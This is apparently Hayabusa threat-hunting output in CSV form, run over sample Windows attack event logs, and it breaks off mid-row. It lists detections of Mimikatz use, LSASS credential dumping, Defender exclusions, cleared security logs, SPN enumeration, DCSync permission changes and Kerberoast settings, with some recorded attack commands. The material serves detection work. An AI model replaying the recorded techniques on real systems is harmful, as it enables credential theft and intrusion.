Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx +2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx +2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx +2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx +2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant 